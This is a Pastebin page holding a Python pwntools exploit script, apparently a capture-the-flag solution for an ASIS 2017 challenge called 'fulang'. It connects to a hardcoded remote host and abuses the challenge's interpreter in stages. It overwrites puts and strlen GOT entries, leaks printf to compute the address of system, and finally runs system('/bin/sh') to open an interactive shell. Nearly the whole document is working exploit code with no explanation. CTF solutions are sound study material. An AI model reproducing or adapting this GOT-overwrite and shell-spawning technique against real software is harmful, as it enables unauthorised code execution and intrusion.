API tools faq
paste
Advertisement
phieulang1993

asis2017_fulang.py

phieulang1993
Apr 9th, 2017
222
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.78 KB | None | 0 0
raw download clone embed print report
  1. from pwn import *
  2. import sys
  3.  
  4. def decrease_address():
  5.     return ":<"
  6. def increase_address():
  7.     return ":>"
  8. def decrease_value():
  9.     return ":-"
  10. def increase_value():
  11.     return ":+"
  12. def put_value():
  13.     return "::"
  14. def set_value():
  15.     return ":."
  16. def xor_value():
  17.     return ":_"
  18.    
  19.  
  20. HOST = '69.90.132.40'
  21. PORT = 4001
  22. r = remote(HOST,PORT)
  23.  
  24. data = 0x0804A080
  25. fu = 0x0804A060
  26. main = 0x080486DE
  27.  
  28. # stage 1: overwrite puts_got => main
  29. r.recvuntil("Enter your code:")
  30. payload = decrease_address()*(data-fu)
  31. payload += set_value()
  32. payload += set_value()
  33. payload += increase_address()+set_value()
  34. payload += increase_address()+set_value()
  35. payload += increase_address()+set_value()
  36. r.sendline(payload)
  37. r.send("\x1C") # puts@plt 0x0804A01C
  38. r.send(p32(main))
  39. r.recvuntil("Enter your code:")
  40.  
  41. # stage 2: leak printf => find system address
  42. payload = decrease_address()*(data-fu)
  43. payload += set_value()
  44. payload += put_value()
  45. payload += increase_address()+put_value()
  46. payload += increase_address()+put_value()
  47. payload += increase_address()+put_value()
  48. r.sendline(payload)
  49. r.send("\x0C") # printf_got
  50. res = ""
  51. while 1:
  52.     res += r.recv(1)
  53.     if len(res)==4:
  54.         break
  55.     sleep(0.1)
  56. printf = u32(res)
  57. print hex(printf)
  58. r.recvuntil("Enter your code:")
  59. offset_system = 59104
  60. system = printf-offset_system
  61. print hex(system)
  62.  
  63. # # stage 3: overwrite strlen => system
  64. payload = decrease_address()*(data-fu)
  65. payload += set_value()
  66. payload += set_value()
  67. payload += increase_address()+set_value()
  68. payload += increase_address()+set_value()
  69. payload += increase_address()+set_value()
  70. r.sendline(payload)
  71. r.send("\x20") # strlen_got 0x804A020
  72. r.send(p32(system))
  73. r.recvuntil("Enter your code:")
  74.  
  75. # stage 4: input strlen("/bin/sh") => system("/bin/sh")
  76. r.sendline("/bin/sh\x00")
  77.  
  78. r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!